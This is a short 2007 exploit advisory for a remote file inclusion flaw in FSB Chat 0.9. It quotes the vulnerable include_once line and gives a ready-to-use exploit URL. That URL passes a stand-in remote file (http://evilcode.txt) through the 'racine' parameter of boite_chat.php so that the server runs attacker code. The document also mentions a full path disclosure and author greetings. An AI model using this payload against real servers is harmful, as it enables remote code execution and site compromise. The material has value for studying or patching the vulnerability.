Home / exploitsPDF  

fsbchat09-rfi.txt

Posted on 23 April 2007

****************************************** *AuThor:Silitoad ************************* *emA!l:Silitoad[at]hotmail[dot]Com ******* *HoMePaGe:http://www.Arabian-FighterZ.com* ****************************************** Powered By Silitoad From Arabian-Fighterz [Info] Website: http://www.zoneur.com Version: 0.9 Download: http://pub.zoneur.com/script/php/fsb/fsbchat/fsbchat-0.9.rar Problem: Include file bug: include_once( $racine . 'includes/functions/fonctions_fsbchat.php' ); [Vuls] 1.Full path disclosure: [Exploit] http://target/fsbchat-0.9/root/includes/boite_chat.php?racine=http://evilcode.txt ? [Fix] Vuls has been reported to author,No reply yet... [Greetings] Greets To Linux_m,l1nuxm4,Sn1p8r,Sbitar,Op3runix

 

TOP